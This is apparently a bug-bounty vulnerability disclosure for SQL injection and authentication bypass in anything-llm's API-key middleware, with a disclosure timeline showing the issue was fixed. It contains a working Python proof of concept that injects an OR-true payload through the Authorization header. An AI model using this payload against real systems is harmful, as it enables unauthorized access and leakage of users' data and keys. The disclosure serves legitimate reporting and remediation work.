SQL injection and Authentication bypass in mintplex-labs/anything-llm

Valid

Reported on

Sep 3rd 2023


Description

The validApiKey middleware, which is responsible for verifying API keys provided in the request's Authorization header, is susceptible to SQL injection. This vulnerability can potentially lead to an authentication bypass, granting unauthorized access to API endpoints.

NOTE: It's worth noting that this SQL injection vulnerability may also expose sensitive data through various attack methods, including blind and time-based attacks. POC

Proof of Concept

import requests

url = "http://localhost:3001/api/v1/system"

headers = {
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/116.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
    "Accept-Language": "en-US,en;q=0.5",
    "Accept-Encoding": "gzip, deflate",
    "Referer": "http://localhost:3000/",
    "Connection": "close",
    "Authorization": "Bearer not_valid_api_key'OR(1)=(1);--", # Injection here
    "Upgrade-Insecure-Requests": "1",
    "Sec-Fetch-Dest": "document",
    "Sec-Fetch-Mode": "navigate",
    "Sec-Fetch-Site": "same-origin",
    "Sec-Fetch-User": "?1",
    "If-None-Match": "W/\"773-MdgLun6ESFXPFk/WGHQAe92jMuI\"",
}

response = requests.get(url, headers=headers)

print(response.text)

Impact

This vulnerability can potentially lead to an authentication bypass, granting unauthorized access to API endpoints. And sensitive data leaks such users informations, api keys ...

We are processing your report and will contact the mintplex-labs/anything-llm team within 24 hours. 6 months ago
A GitHub Issue asking the maintainers to create a SECURITY.md exists 6 months ago
We have contacted a member of the mintplex-labs/anything-llm team and are waiting to hear back 6 months ago
mintplex-labs/anything-llm maintainer validated this vulnerability 6 months ago
vvxhid has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
mintplex-labs/anything-llm maintainer marked this as fixed in 0.0.1 with commit dc3dfb 6 months ago
The fix bounty has been dropped
This vulnerability has now been published 6 months ago
validApiKey.js#L17 has been validated
to join this conversation